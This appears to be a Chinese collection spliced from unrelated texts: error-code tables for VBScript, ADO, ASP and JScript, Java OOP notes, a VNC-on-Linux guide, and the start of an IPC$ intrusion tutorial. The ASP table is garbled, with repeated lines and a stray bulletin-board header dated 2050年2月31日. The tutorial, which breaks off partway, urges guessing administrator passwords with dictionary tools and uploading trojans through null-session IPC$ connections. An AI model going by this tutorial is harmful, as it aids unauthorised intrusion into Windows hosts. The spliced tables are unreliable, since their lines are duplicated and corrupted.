Microsoft VBScript 运行时错误(0x800A000A)-->该数组为定长的或临时被锁定
Microsoft VBScript 运行时错误(0x800A000B)-->被零除
Microsoft VBScript 运行时错误(0x800A000D)-->类型不匹配
Microsoft VBScript 运行时错误(0x800A000E)-->字符串空间不够
Microsoft VBScript 运行时错误(0x800A0011)-->不能执行所需的操作
Microsoft VBScript 运行时错误(0x800A001C)-->堆栈溢出
Microsoft VBScript 运行时错误(0x800A0023)-->未定义过程或函数
Microsoft VBScript 运行时错误(0x800A0030)-->加载 DLL 时出错
Microsoft VBScript 运行时错误(0x800A0033)-->内部错误
Microsoft VBScript 运行时错误(0x800A0034)-->错误的文件名或号码
Microsoft VBScript 运行时错误(0x800A0035)-->文件未找到
Microsoft VBScript 运行时错误(0x800A0036)-->错误的文件模式
Microsoft VBScript 运行时错误(0x800A0037)-->文件已经打开
Microsoft VBScript 运行时错误(0x800A0039)-->设备 I/O 错误
Microsoft VBScript 运行时错误(0x800A003A)-->文件已存在
Microsoft VBScript 运行时错误(0x800A003D)-->磁盘已满
Microsoft VBScript 运行时错误(0x800A003E)-->输入超出了文件尾
Microsoft VBScript 运行时错误(0x800A0043)-->文件过多
Microsoft VBScript 运行时错误(0x800A0044)-->设备不可用
Microsoft VBScript 运行时错误(0x800A0046)-->没有权限
Microsoft VBScript 运行时错误(0x800A0047)-->磁盘没有准备好
Microsoft VBScript 运行时错误(0x800A004A)-->重命名时不能带有其他驱动器符号
Microsoft VBScript 运行时错误(0x800A004B)-->路径/文件访问错误
Microsoft VBScript 运行时错误(0x800A004C)-->路径未找到
Microsoft VBScript 运行时错误(0x800A005B)-->对象变量未设置
Microsoft VBScript 运行时错误(0x800A005C)-->For 循环未初始化
Microsoft VBScript 运行时错误(0x800A005E)-->无效使用 Null
Microsoft VBScript 运行时错误(0x800A0142)-->不能创建所需的临时文件
Microsoft VBScript 运行时错误(0x800A01A8)-->缺少对象
Microsoft VBScript 运行时错误(0x800A01AD)-->ActiveX 部件不能创建对象
Microsoft VBScript 运行时错误(0x800A01AE)-->类不能支持 Automation 操作
Microsoft VBScript 运行时错误(0x800A01B0)-->Automation 操作中文件名或类名未找到
Microsoft VBScript 运行时错误(0x800A01B6)-->对象不支持此属性或方法
Microsoft VBScript 运行时错误(0x800A01B8)-->Automation 操作错误
Microsoft VBScript 运行时错误(0x800A01BD)-->对象不支持此操作
Microsoft VBScript 运行时错误(0x800A01BE)-->对象不支持已命名参数
Microsoft VBScript 运行时错误(0x800A01BF)-->对象不支持当前区域设置
Microsoft VBScript 运行时错误(0x800A01C0)-->未找到已命名参数
Microsoft VBScript 运行时错误(0x800A01C1)-->参数是必选项
Microsoft VBScript 运行时错误(0x800A01C2)-->错误的参数个数或无效的参数属性值
Microsoft VBScript 运行时错误(0x800A01C3)-->对象不是一个集合
Microsoft VBScript 运行时错误(0x800A01C5)-->未找到指定的 DLL 函数
Microsoft VBScript 运行时错误(0x800A01C7)-->代码资源锁定错误
Microsoft VBScript 运行时错误(0x800A01CA)-->变量使用了一个 VBScript 中不支持的 Automation 类型
Microsoft VBScript 运行时错误(0x800A01CE)-->远程服务器不存在或不可用
Microsoft VBScript 运行时错误(0x800A01E1)-->无效图片
Microsoft VBScript 运行时错误(0x800A01F4)-->变量未定义
Microsoft VBScript 运行时错误(0x800A01F5)-->非法赋值
Microsoft VBScript 运行时错误(0x800A01F6)-->对象不能安全地使用 Script 编程
Microsoft VBScript 运行时错误(0x800A01F7)-->对象不能安全初始化
Microsoft VBScript 运行时错误(0x800A01F8)-->对象不能安全创建
Microsoft VBScript 运行时错误(0x800A01F9)-->无效的或无资格的引用
Microsoft VBScript 运行时错误(0x800A01FA)-->类没有被定义
Microsoft VBScript 运行时错误(0x800A01FB)-->出现一个意外错误
Microsoft VBScript 运行时错误(0x800A1398)-->缺少常规表达式对象
Microsoft VBScript 运行时错误(0x800A1399)-->常规表达式语法错误
Microsoft VBScript 运行时错误(0x800A139A)-->错误的数量词
Microsoft VBScript 运行时错误(0x800A139B)-->常规表达式中缺少 ']'
Microsoft VBScript 运行时错误(0x800A139C)-->常规表达式中缺少 ')'
Microsoft VBScript 运行时错误(0x800A139D)-->字符集越界
Microsoft VBScript 运行时错误(0x800A802B)-->未找到元素
ActiveServerPages,ASP0126(0x80004005)-->找不到包含文件
Microsoft OLEDBProviderforODBCDrivers(0x80040E14)-->sql语句出错(字段名错误,或数据类型不匹配)
Microsoft OLEDBProviderforODBCDrivers(0x80040E07)-->sql语句出错(要插入或更新的字段的类型与变量数据类型不匹配)
Microsoft OLEDBProviderforODBCDrivers(0x80040E57)-->sql语句出错(要插入或更新的数据溢出)
Microsoft OLEDBProviderforODBCDrivers(0x80040E10)-->sql语句出错(update字段名或要更新的数据类型错误)
Microsoft OLEDBProviderforODBCDrivers(0x80004005)-->sql语句出错(要插入或更新的字段的数值不能为空值)
Microsoft OLEDBProviderforODBCDrivers(0x80004005)-->打开数据库出错,没有在指定目录发现数据库
Microsoft OLEDBProviderforODBCDrivers(0x80040E37)-->没有发现表
ODBCDrivers(0x80040E21)-->sql语句出错(数据类型不匹配或表/字段错误或处于编辑状态,或不存在于conn打开的数据库中)
ADODB.Recordset(0x800A0BB9)-->sql语句出错(sql语句或conn语句未定义或对一个rs属性进行赋值时发生错误)
ADODB.Recordset(0x800A0CC1)-->rs对像出错(rs对像本身不存在或错误地引用了一个不存在的字段名)
ADODB.Recordset(0x800A0BCD)-->rs对像出错(记录集中没有记录却对记录集进行操作)
ADODB.Recordset(0x800A0E78)-->rs对像出错(记录集不存在,缺少rs.open语句)
ADODB.Recordset(0x800A0CC1)-->rs对像出错(引用了一个不存在的字段名)
ADODB.Recordset(0x800A0E7D)-->conn定义错误
ADODB.Recordset(0x800A0CB3)-->数据库以只读方式打开,无法更新数据
ADODB.Recordset(0x800A000D)-->错误引用rs变量(rs对像已关闭或未定义)
---------------------------------------
大部分的ADO的错误码对应的含义
除了在 Error 对象和 Errors 集合中说明的提供者错误之外,ADO 本身也将错误返回到
运行时环境的异常处理机制之中。使用编程语言的错误捕获机制(如 Microsoft®
Visual Basic® 中的 On Error 语句)可捕获及处理下列错误。下表将同时显示十
进制和十六进制错误代码值。
常量名称 编号 说明
adErrInvalidArgument 3001 0x800A0BB9 应用程序使用的参数其类型错误、超出可接受
的范围或者与其他参数冲突。
adErrNoCurrentRecord 3021 0x800A0BCD BOF 或 EOF 为 True,或者当前记录已经删除
。应用程序请求的操作需要当前记录。
adErrIllegalOperation 3219 0x800A0C93 应用程序请求的操作不允许出现在该上下文
中 adErrInTransaction 3246 0x800A0CAE 在事务中应用程序无法显式关闭
Connection 对象。
adErrFeatureNotAvailable 3251 0x800A0CB3 提供者不支持应用程序请求的操作。
adErrItemNotFound 3265 0x800A0CC1 ADO 无法在对应于应用程序请求的名称或顺序引
用的集合中找到对象。
adErrObjectInCollection 3367 0x800A0D27 无法追加,对象已经在集合中。
adErrObjectNotSet 3420 0x800A0D5C 应用程序引用的对象不再指向有效的对象。
adErrDataConversion 3421 0x800A0D5D 应用程序使用了不符合对当前操作的值类型。
adErrObjectClosed 3704 0x800A0E78 如果对象关闭,则不允许应用程序请求的操作。
adErrObjectOpen 3705 0x800A0E79 如果对象打开,则不允许应用程序请求的操作。
adErrProviderNotFound 3706 0x800A0E7A ADO 找不到指定的提供者。
adErrBoundToCommand 3707 0x800A0E7B 应用程序无法用 Command 对象将 Recordset
对象的 ActiveConnection 属性更改为它的来源数据。
adErrInvalidParamInfo 3708 0x800A0E7C 应用程序错误地定义了 Parameter 对象。
adErrInvalidConnection 3709 0x800A0E7D 应用程序通过引用关闭或无效的
Connection 对象来请求对对象的操作。
*****************************************************************************
ASP错误代码说明
错误代码 错误消息 说明
ASP0100 Out of memory 内存不足(不能分配要求的内存
ASP0101 Unexpected error 意外错误
ASP0102 Expecting string input 缺少字符串输入
ASP0103 Expecting numeric input 缺少数字输入
ASP0104 Opration not allowed 操作不允许
ASP0105 Index out of ange 索引超出范围(一个数组索引超届)
ASP0106 Type Mismatch 类型不匹配(遇到的数据类型不能被处理)
ASP0107 Stack Overflow 栈溢出(正在处理的数据超出了允许的范围)
ASP0115 Unexpected error 意外错误(外部对象出现可捕获的exception_name错误,脚
本不能继续运行)
ASP0177 Server.CreateObject Failed 服务器创建对象失败(无效的progid)
ASP0190 Unexpected error 意外错误(当释放外部对象,产生可捕获的错误)
ASP0191 Unexpected error 意外错误(在外部对象的OnStartPage方法中产生可捕获的错
误)
ASP0192 Unexpected error 意外错误(在外部对象的OnEndPage方法中产生可捕获的错误
发信人: longsi——现代速龙(时速200公里),信区:X-COM基地
ASP0177 Server.CreateObject Failed 服务器创建对象失败(无效的progid)
发信站: 侏罗纪公园(2050年2月31日18:30:00 星期六),站内信件 获的错误)
ASP0191 Unexpected error 意外错误(在外部对象的OnStartPage方法中产生可捕获的错
误)
ASP0192 Unexpected error 意外错误(在外部对象的OnEndPage方法中产生可捕获的错误
)
ASP0193 OnStartPage Failed 在外部对象的OnStartPage方法中产生错误
ASP0194 OnEndPage Failed 在外部对象的OnEndPage方法中产生错误
ASP0240 Script Engine Exception 脚本引擎从object_name对象中抛出exception_anme
异常
ASP0241 CreateObject Exception object_name 对象的CreatObject方法引起了excepti
on_name异常
ASP0242 Query OnStartPage nterface 查询对象Object_name的OnsException
**********************************************
JScript 运行时错误
JScript 运行时错误是指当 JScript 脚本试图执行一个系统不能运行的动作时导致的错
误。当正在运行脚本、计算变量表达式、或者正在动态分配内存时出现JScript 运行时
错误时。
以下是76个运行时错误
错误号 描述
十进制 十六进制 说明
5 800A0005 非法过程调用或参数
6 800A0006 溢出
7 800A0007 内存不足
9 800A0009 下标超界
10 800A000A 此数组被固定或临时锁定
11 800A000B 零除错误
13 800A000D 类型失配
14 800A000E 串空间不足
17 800A0011 不能执行所请求的操作
28 800A001C 栈空间不足
35 800A0023 子过程或函数未找到
48 800A0030 装载DLL出错
51 800A0033 内部出错
52 800A0034 坏文件名或数
53 800A0035 文件未找到
54 800A0036 坏文件模式
55 800A0037 文件已经打开
57 800A0039 设备I/O错误
58 800A003A 文件已经存在
61 800A003D 磁盘空间已满
62 800A003E 输入超出文件尾
67 800A0043 文件太多
68 800A0044 设备不可用
70 800A0046 权限禁用
71 800A0047 磁盘未准备好
74 800A004A 不能用不同的驱动重命名
75 800A004B 路径/文件访问错误
76 800A004C 路径未找到
91 800A005B 对象变量或With块变量未设置
92 800A005C For循环未初始化
94 800A005E Null使用无效
322 800A0042 不能建立所需的临时文件
424 800A01A8 需要对象
429 800A01A9 Automation服务器不能建立对象
430 800A01AE 类不支持Automation
432 800A01B0 在Automation操作中找不到文件名或类名
438 800A01B6 对象不支持这个属性或方法
440 800A01B8 Automation错误
445 800A01BD 对象不支持这个动作
446 800A01BE 对象不支持指定的参数
447 800A01BF 对象不支持当前区域设置
448 800A01C0 指定的参数未找到
449 800A01C1 参数不可选
450 800A01C2 错误的参数数目或非法属性分配
451 800A01C3 对象不是一个集合
453 800A01C5 指定的dll函数未找到
458 800A01CA 变量使用了一个Jscript不支持的Automation类型
462 800A01CE 远程服务器机器不存在或不可用
501 800A01F5 不能分配给变量
502 800A01F6 对象对于脚本不安全
503 800A01F7 对象对于初始化不安全
504 800A01F8 对象对建立不安全
5000 800A1388 不能分配给“this”
5001 800A1389 需要 Number 类型
5002 800A138A 需要 Function 对象
5003 800A138B 不能给函数返回值赋值
5004 800A138C 不能索引对象
5005 800A138D 需要 String
5006 800A138E 需要 Date 对象
5007 800A138F 需要 Object 类型
5008 800A1390 非法赋值
5009 800A1391 未定义标识符
5010 800A1392 需要 Boolean
5011 800A1393 不能执行来自一个自由脚本的代码
5012 800A1394 需要对象的成员
5013 800A1395 需要 VBArray
5014 800A1396 需要 JScript 对象
5015 800A1397 需要 Enumerator 对象
5016 800A1398 需要正则表达式对象
5017 800A1399 正则表达式语法错误
5018 800A139A 未预期的限定符
5019 800A139B 正则表达式中缺少“]”
5020 800A139C 正则表达式中缺少“)”
5021 800A139D 字符集范围无效
5022 800A139E 异常抛出,但无法抓住
5023 800A139F 函数没有合法的 Prototype (原型)对象
5024 800A13A0 待解码的 URI 包含有非法字符
5025 800A13A1 待解码的 URI 编码非法
5026 800A13A2 小数部分的位数越界
5027 800A13A3 精度越界
5028 800A13A4 需要 Array 或 arguments 对象
5029 800A13A5 数组长度必须为一有限正整数
5030 800A13A6 必须赋给数组长度一个有限正数
*******************************************************
jscript错误代码及相应解释大全
JScript 语法错误
JScript 语法错误是指当 JScript 语句违反了 JScript 脚本语言的一条或多条语法规
则时导致的错误。JScript 语法错误发生在程序编译阶段,在开始运行该程序之前。(
错误发生在开发过程中),以下是32个语法错误
错误号 描述
十进制 十六进制 说明
1001 800A03E9 内存不足
1002 800A03EA 语法错误
1003 800A03EB 需要“:”
1004 800A03EC 需要“;”
1005 800A03ED 需要“(”
1006 800A03EE 需要“)”
1007 800A03EF 需要“]”
1008 800A03F0 需要“{”
1009 800A03F1 需要“}”
1010 800A03F2 需要标识符
1011 800A03F3 需要“=”
1012 800A03F4 需要“/”
1013 800A03F5 无效数
1014 800A03F6 非法字符
1015 800A03F7 字符串常数未结束
1016 800A03F8 注释未结束
1018 800A03FA 函数外有 ’return’ 语句
1019 800A03FB 在循环外不能有“break”
1020 800A03FC 在循环外不能有“continue”
1023 800A03FF 需要十六进制数
1024 800A0400 需要“while”
1025 800A0401 标签定义重复
1026 800A0402 未找到标签
1027 800A0403 一条 “switch” 语句中只能有一个 “default”
1028 800A0404 需要标识符、字符串或者数字
1029 800A0405 需要“@end”
1030 800A0406 条件编译已关闭
1031 800A0407 需要常数
1032 800A0408 需要“@”
1033 800A0409 需要“catch”
1034 800A040A 需要“var”
1035 800A040B “Throw”的后面必须跟有一个表达式,且在同一源代码行上
************************************************************************
VBScript 运行时错误
如果 VBScript 脚本执行系统无法实施的操作,则会产生 VBScript 运行时错误。只有
在运行脚本、为变量表达式赋值或
分配内存时,才会产生 VBScript 运行时错误。 以下是65个运行时错误:
错误编号 描述
十进制 十六进制 说明
5 800A0005 无效过程调用或参数
6 800A0006 溢出
7 800A0007 内存不足
9 800A0009 下标越界
10 800A000A 该数组为定长的或临时被锁定
11 800A000B 被零除
13 800A000D 类型不匹配
14 800A000E 字符串空间溢出
17 800A0011 无法执行请求的操作
28 800A001C 堆栈溢出
35 800A0023 未定义 Sub 或 Function
48 800A0030 加载 DLL 错误
51 800A0033 内部错误
52 800A0034 坏文件名或数
53 800A0035 文件未找到
54 800A0036 坏文件模式
55 800A0037 文件已经打开
57 800A0039 设备I/O错误
58 800A003A 文件已经存在
61 800A003D 磁盘空间已满
62 800A003E 输入超出文件尾
67 800A0043 文件太多
68 800A0044 设备不可用
70 800A0046 权限禁用
71 800A0047 磁盘未准备好
74 800A004A 不能用不同的驱动器重新命名
75 800A004B 路径/文件访问错误
76 800A004C 路径未找到
91 800A005B 未设置对象变量
92 800A005C For 循环未初始化
94 800A005E 非法使用 Null
322 800A0142 不能建立所需临时文件
424 800A01A8 需要对象
429 800A01AD ActiveX 部件无法创建对象
430 800A01AE 类不支持自动化
432 800A01B0 在自动化操作中未找到文件名或类名
438 800A01B6 对象不支持该属性或方法
440 800A01B8 Automation错误
445 800A01BD 对象不支持此操作
446 800A01BE 对象不支持指定的参数
447 800A01BF 对象不支持当前的区域设置
448 800A01C0 未找到命名参数
449 800A01C1 参数不可选
450 800A01C2 错误的参数个数或无效的参数属性值
451 800A01C3 对象不是一个集合
453 800A01C5 指定的dll函数未找到
455 800A01C7 代码源锁错误
457 800A01C9 这个键已经是本集合的一个元素关联
458 800A01CA 变量使用了一个 VBScript 中不支持的自动化(Automation)类型
462 800A01CE 远程服务器不存在或不能访问
481 800A01E1 无效图片
500 800A01F4 变量未定义
501 800A01F5 违法的分配
502 800A01F6 脚本对象不安全
503 800A01F7 对象不能安全初始化
504 800A01F8 对象不能安全创建
505 800A01F9 无效的或不合格的引用
506 800A01FA 类未被定义
507 800A01FB 发生异常
5016 800A1398 需要正则表达式对象
5017 800A1399 正则表达式中的语法错误
5018 800A139A 错误的数量词
5019 800A139B 在正则表达式中需要 ']'
5020 800A139C 在正则表达式中需要 ')'
5021 800A139D 字符集越界
32811 800A802B 元素未找到
**************************************************************
vbscript错误代码及对应解释大全
VBScript 语法错误
如果 VBScript 语句结构违反了一个或多个 VBScript 脚本语言语法规则,就会产生
VBScript 语法错误。
错误通常在执行程序前,编译程序时产生。 以下是53个语法错误:
错误编号 描述
十进制 十六进制 说明
1001 800A03E9 内存不足
1002 800A03EA 语法错误
1003 800A03EB 缺少“:”
1005 800A03ED 需要 '('
1006 800A03EE 需要 ')'
1007 800A03EF 缺少“]”
1010 800A03F2 需要标识符
1011 800A03F3 需要 '='
1012 800A03F4 需要 'If'
1013 800A03F5 需要 'To'
1014 800A03F6 需要 'End'
1015 800A03F7 需要 'Function'
1016 800A03F8 需要 'Sub'
1017 800A03F9 需要 'Then'
1018 800A03FA 需要 'Wend'
1019 800A03FB 需要 'Loop'
1020 800A03FC 需要 'Next'
1021 800A03FD 需要 'Case'
1022 800A03FE 需要 'Select'
1023 800A03FF 需要表达式
1024 800A0400 需要语句
1025 800A0401 需要语句的结束
1026 800A0402 需要整数常数
1027 800A0403 需要 'While' 或 'Until'
1028 800A0404 需要 'While,'、 'Until,' 或语句未结束
1029 800A0405 需要 'With'
1030 800A0406 标识符太长
1031 800A0407 无效的数
1032 800A0408 无效的字符
1033 800A0409 未结束的串常量
1034 800A040A 未结束的注释
1037 800A040D 无效使用关键字 'Me'
1038 800A040E 'loop' 没有 'do'
1039 800A040F 无效 'exit' 语句
1040 800A0410 无效 'for' 循环控制变量
1041 800A0411 名称重定义
1042 800A0412 必须为行的第一个语句
1043 800A0413 不能赋给非Byval参数
1044 800A0414 调用 Sub 时不能使用圆括号
1045 800A0415 需要文字常数
1046 800A0416 需要 'In'
1047 800A0417 需要 'Class'
1048 800A0418 必须在一个类的内部定义
1049 800A0419 在属性声明中需要 Let , Set 或 Get
1050 800A041A 需要 'Property'
1051 800A041B 参数数目必须与属性说明一致
1052 800A041C 在类中不能有多个缺省的属性/方法
1053 800A041D 类初始化或终止不能带参数
1054 800A041E Property Let 或 Set 至少应该有一个参数
1055 800A041F 不需要的 'Next'
1056 800A0420 只能在 ‘Property’ 或 ’Function’ 或 ’Sub’ 上指定 ’Default ’
1057 800A0421 说明 'Default' 必须同时说明 'Public' "
1058 800A0422 只能在 Property Get 中指定 'Default'
Java的白皮书为我们提出了Java语言的11个关键特性
(2)分布式:Java带有很强大的TCP/IP协议族的例程库,Java应用程序能够通过URL来穿过网络来访问远程对象,由于servlet机制的出现,使Java编程非常的高效,现在许多的大的web server都支持servlet。
(3)OO:面向对象设计是把重点放在对象及对象的接口上的一个编程技术.其面向对象和C++有很多不同,在与多重继承的处理及Java的原类模型。
(4)健壮特性:Java采取了一个安全指针模型,能减小重写内存和数据崩溃的可能型。
(5)安全:Java用来设计网路和分布系统,这带来了新的安全问题,Java可以用来构建防病毒和防攻击的System.事实证明Java在防毒这一方面做的比较好。
(6)中立体系结构:Java编译其生成体系结构中立的目标文件格式可以在很多处理器上执行,编译器产生的指令字节码(Javabytecode)实现此特性,此字节码可以在任何机器上解释执行。
(7)可移植性:Java中对基本数据结构类型的大小和算法都有严格的规定所以可移植性很好。
(8)多线程:Java处理多线程的过程很简单,Java把多线程实现交给底下操作系统或线程程序完成.所以多线程是Java作为服务器端开发语言的流行原因之一。
(9)Applet和servlet:能够在网页上执行的程序叫Applet,需要支持Java的浏览器很多,而applet支持动态的网页,这是很多其他语言所不能做到的。
基本概念
1.OOP中唯一关系的是对象的接口是什么,就像计算机的销售商她不管电源内部结构是怎样的,他只关系能否给你提供电就行了,也就是只要知道can or not而不是how and why.所有的程序是由一定的属性和行为对象组成的,不同的对象的访问通过函数调用来完成,对象间所有的交流都是通过方法调用,通过对封装对象数据,很大限度上提高复用率。
2.OOP中最重要的思想是类,类是模板是蓝图,从类中构造一个对象,即创建了这个类的一个实例(instance)。
3.封装:就是把数据和行为结合起在一个包中)并对对象使用者隐藏数据的实现过程,一个对象中的数据叫他的实例字段(instance field)。
4.通过扩展一个类来获得一个新类叫继承(inheritance),而所有的类都是由Object根超类扩展而得,根超类下文会做介绍。
5.对象的3个主要特性
behavior---说明这个对象能做什么.
state---当对象施加方法时对象的反映.
dentity---与其他相似行为对象的区分标志.
每个对象有唯一的indentity 而这3者之间相互影响.
6.类之间的关系:
use-a :依赖关系
has-a :聚合关系
is-a :继承关系--例:A类继承了B类,此时A类不仅有了B类的方法,还有其自己的方法.(个性存在于共性中)
7.构造对象使用构造器:构造器的提出,构造器是一种特殊的方法,构造对象并对其初始化。
例:Data类的构造器叫Data
new Data()---构造一个新对象,且初始化当前时间.
Data happyday=new Data()---把一个对象赋值给一个变量happyday,从而使该对象能够多次使用,此处要声明的使变量与对象变量二者
是不同的.new返回的值是一个引用。
构造器特点:构造器可以有0个,一个或多个参数
构造器和类有相同的名字
一个类可以有多个构造器
构造器没有返回值
构造器总是和new运算符一起使用.
8.重载:当多个方法具有相同的名字而含有不同的参数时,便发生重载.编译器必须挑选出调用哪个方法。
9.包(package)Java允许把一个或多个类收集在一起成为一组,称作包,以便于组织任务,标准Java库分为许多包.java.lang java.util java,net等,包是分层次的所有的java包都在java和javax包层次内。
10.继承思想:允许在已经存在的类的基础上构建新的类,当你继承一个已经存在的类时,那么你就复用了这个类的方法和字段,同时你可以在新类中添加新的方法和字段。
11.扩展类:扩展类充分体现了is-a的继承关系. 形式为:class (子类) extends (基类)。
12.多态:在java中,对象变量是多态的.而java中不支持多重继承。
13.动态绑定:调用对象方法的机制。
(1)编译器检查对象声明的类型和方法名。
(2)编译器检查方法调用的参数类型。
(3)静态绑定:若方法类型为priavte static final 编译器会准确知道该调用哪个方法。
(4)当程序运行并且使用动态绑定来调用一个方法时,那么虚拟机必须调用x所指向的对象的实际类型相匹配的方法版本。
(5)动态绑定:是很重要的特性,它能使程序变得可扩展而不需要重编译已存代码。
14.final类:为防止他人从你的类上派生新类,此类是不可扩展的。
15.动态调用比静态调用花费的时间要长。
16.抽象类:规定一个或多个抽象方法的类本身必须定义为abstract。
例: public abstract string getDescripition
17.Java中的每一个类都是从Object类扩展而来的。
18.object类中的equal和toString方法。
equal用于测试一个对象是否同另一个对象相等。
toString返回一个代表该对象的字符串,几乎每一个类都会重载该方法,以便返回当前状态的正确表示.
(toString 方法是一个很重要的方法)
19.通用编程:任何类类型的所有值都可以同object类性的变量来代替。
20.数组列表:ArrayList动态数组列表,是一个类库,定义在java.uitl包中,可自动调节数组的大小。
21.class类 object类中的getclass方法返回ckass类型的一个实例,程序启动时包含在main方法的类会被加载,虚拟机要加载他需要的所有类,每一个加载的类都要加载它需要的类。
22.class类为编写可动态操纵java代码的程序提供了强大的功能反射,这项功能为JavaBeans特别有用,使用反射Java能支持VB程序员习惯使用的工具。
能够分析类能力的程序叫反射器,Java中提供此功能的包叫Java.lang.reflect反射机制十分强大.
1.在运行时分析类的能力。
2.在运行时探察类的对象。
3.实现通用数组操纵代码。
4.提供方法对象。
而此机制主要针对是工具者而不是应用及程序。
反射机制中的最重要的部分是允许你检查类的结构.用到的API有:
java.lang.reflect.Field 返回字段.
java.reflect.Method 返回方法.
java.lang.reflect.Constructor 返回参数.
方法指针:java没有方法指针,把一个方法的地址传给另一个方法,可以在后面调用它,而接口是更好的解决方案。
23.接口(Interface)说明类该做什么而不指定如何去做,一个类可以实现一个或多个interface。
24.接口不是一个类,而是对符合接口要求的类的一套规范。
若实现一个接口需要2个步骤:
1.声明类需要实现的指定接口。
2.提供接口中的所有方法的定义。
声明一个类实现一个接口需要使用implements 关键字
class actionB implements Comparable 其actionb需要提供CompareTo方法,接口不是类,不能用new实例化一个接口.
25.一个类只有一个超类,但一个类能实现多个接口。Java中的一个重要接口:Cloneable
26.接口和回调.编程一个常用的模式是回调模式,在这种模式中你可以指定当一个特定时间发生时回调对象上的方法。
例:ActionListener 接口监听.
类似的API有:java.swing.JOptionPane
java.swing.Timer
java.awt.Tookit
27.对象clone:clone方法是object一个保护方法,这意味着你的代码不能简单的调用它。
28.内部类:一个内部类的定义是定义在另一个内部的类。
原因是:
1.一个内部类的对象能够访问创建它的对象的实现,包括私有数据。
2.对于同一个包中的其他类来说,内部类能够隐藏起来。
3.匿名内部类可以很方便的定义回调。
4.使用内部类可以非常方便的编写事件驱动程序。
29.代理类(proxy):
1.指定接口要求所有代码
2.object类定义的所有的方法(toString equals)
30.数据类型:Java是强调类型的语言,每个变量都必须先申明它都类型,java中总共有8个基本类型.4种是整型,2种是浮点型,一种是字符型,被用于Unicode编码中的字符,布尔型。
教您如何利用VNC远程图形界面控制Linux
Windows下面的远程图形界面的控制大家都已经驾轻就熟了。其实Linux下面利用vnc来图形界面的控制也是非常简单的。VNC是由两部分组成:一部分是客户端的应用程序(vncviewer);另外一部分是服务器端的应用程序(vncserver)。
以redhat linux 8.0下面的安装和使用为例
一、安装vnc的rpm包
1.安装linux
1.1 图形界面下的安装要是在KDE或者GNOME下,直接点击rpm包,系统会自动开始安装。中间还会提示你设 置密码,端口等。
1.2 命令行下的安装。
下面还是说说命令行下的安装,其实也是非常简单的,一个命令就可以了。
cd /mnt/f/vnc/
rpm -ivh vnc-3.3.6-2.i386.rpm
2.设置vnc server的访问密码
vncpasswd
3.启动vnc server
vncserver
4.linux上的vnc server内定的管理环境是twm,不好看,也不方便。我们来把它改成KDE. 修改$HOME/.vnc/xstartup这个文件.把starttwm改成startkde 修改后要重新启动vnc server。
二、远程连接
现在你可以在各种平台下控制linux了。服务器端 (vncserver)还内建了Java Web接口,这样用户通过服务器端对其他计算机的操作就能通过浏览器(必须支持java applet)显示出来了,这样的操作过程和显示方式非常直观方便。
详尽的IPC$入侵
利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。
我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。
所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.
解惑:
1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能,其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数,所以不能在Windows 9.x中运行。
也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)
2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接
3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表
二 、建立ipc$连接在hack攻击中的作用
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!
(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server,还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)
不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(
因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.
所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.
三、 ipc$与空连接,139,445端口,默认共享的关系
以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)
1)ipc$与空连接:
不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.
许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).
2)ipc$与139,445端口:
ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.
3)ipc$与默认共享
默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)
四、 ipc$连接失败的原因
以下5个原因是比较常见的:
1)你的系统不是NT或以上操作系统;
2)对方没有打开ipc$默认共享
3)对方未开启139或445端口(惑被防火墙屏蔽)
4)你的命令输入有误(比如缺少了空格等)
5)用户名或密码错误(空连接当然无所谓了)
另外,你也可以根据返回的错误号分析原因:
